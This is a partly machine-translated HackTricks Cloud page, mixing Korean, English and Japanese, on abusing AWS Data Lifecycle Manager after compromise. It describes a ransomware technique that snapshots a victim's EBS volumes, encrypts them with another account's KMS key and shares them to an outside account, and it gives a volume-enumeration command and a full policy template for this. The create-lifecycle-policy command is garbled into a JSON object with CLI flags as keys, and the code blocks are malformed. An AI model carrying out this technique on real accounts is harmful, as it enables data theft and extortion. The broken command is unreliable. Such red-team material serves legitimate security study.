AWS - DLM Post Exploitation

htARTE (HackTricks AWS Red Team Expert)를 통해 제로부터 AWS 해킹을 전문가로 배우세요!

HackTricks를 지원하는 다른 방법들:

회사를 HackTricks에서 광고하거나 HackTricks를 PDF로 다운로드하고 싶다면 구독 요금제를 확인하세요!
공식 PEASS & HackTricks 굿즈를 구매하세요
The PEASS Family를 발견하세요, 당사의 독점 NFTs 컬렉션
💬 Discord 그룹 또는 텔레그램 그룹에 가입하거나 트위터 🐦 @hacktricks_live를 팔로우하세요.
해킹 요령을 공유하려면 HackTricks 및 HackTricks Cloud 깃허브 저장소에 PR을 제출하세요.

데이터 라이프사이클 관리자 (DLM)

`EC2:DescribeVolumes`, `DLM:CreateLifeCyclePolicy`

랜섬웨어 공격은 가능한 많은 EBS 볼륨을 암호화한 다음 현재 EC2 인스턴스, EBS 볼륨 및 스냅샷을 삭제함으로써 실행될 수 있습니다. 이 악의적인 활동을 자동화하기 위해 Amazon DLM을 사용하여 다른 AWS 계정의 KMS 키로 스냅샷을 암호화하고 암호화된 스냅샷을 다른 계정으로 전송할 수 있습니다. 또는 암호화하지 않은 스냅샷을 관리하는 계정으로 전송한 다음 그곳에서 암호화할 수도 있습니다. 기존 EBS 볼륨이나 스냅샷을 직접 암호화하는 것은 간단하지 않지만 새 볼륨이나 스냅샷을 생성함으로써 가능합니다.

먼저 인스턴스 ID, 볼륨 ID, 암호화 상태, 첨부 상태 및 볼륨 유형과 같은 볼륨에 대한 정보를 수집하는 명령을 사용할 것입니다. aws ec2 describe-volumes

Secondly, one will create the lifecycle policy. This command employs the DLM API to set up a lifecycle policy that automatically takes daily snapshots of specified volumes at a designated time. It also applies specific tags to the snapshots and copies tags from the volumes to the snapshots. The policyDetails.json file includes the lifecycle policy's specifics, such as target tags, schedule, the ARN of the optional KMS key for encryption, and the target account for snapshot sharing, which will be recorded in the victim's CloudTrail logs.

```json
{
  "aws dlm create-lifecycle-policy --description": "내 첫 번째 정책",
  "--state": "ENABLED",
  "--execution-role-arn": "arn:aws:iam::12345678910:role/AWSDataLifecycleManagerDefaultRole",
  "--policy-details": "file://policyDetails.json"
}


A template for the policy document can be seen here:
```bash
```json
{
    "PolicyType": "EBS_SNAPSHOT_MANAGEMENT",
    "ResourceTypes": [
        "VOLUME"
    ],
    "TargetTags": [
        {
            "Key": "ExampleKey",
            "Value": "ExampleValue"
        }
    ],
    "Schedules": [
        {
            "Name": "DailySnapshots",
            "CopyTags": true,
            "TagsToAdd": [
                {
                    "Key": "SnapshotCreator",
                    "Value": "DLM"
                }
            ],
            "VariableTags": [
                {
                    "Key": "CostCenter",
                    "Value": "Finance"
                }
            ],
            "CreateRule": {
                "Interval": 24,
                "IntervalUnit": "HOURS",
                "Times": [
                    "03:00"
                ]
            },
            "RetainRule": {
                "Count": 14
            },
            "FastRestoreRule": {
                "Count": 2,
                "Interval": 12,
                "IntervalUnit": "HOURS"
            },
            "CrossRegionCopyRules": [
                {
                    "TargetRegion": "us-west-2",
                    "Encrypted": true,
                    "CmkArn": "arn:aws:kms:us-west-2:123456789012:key/your-kms-key-id",
                    "CopyTags": true,
                    "RetainRule": {
                        "Interval": 1,
                        "IntervalUnit": "DAYS"
                    }
                }
            ],
            "ShareRules": [
                {
                    "TargetAccounts": [
                        "123456789012"
                    ],
                    "UnshareInterval": 30,
                    "UnshareIntervalUnit": "DAYS"
                }
            ]
        }
    ],
    "Parameters": {
        "ExcludeBootVolume": false
    }
}


<details>

<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Other ways to support HackTricks:

* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>

前へAWS - Control Tower Post Exploitation 次へAWS - DynamoDB Post Exploitation

最終更新 1 か月前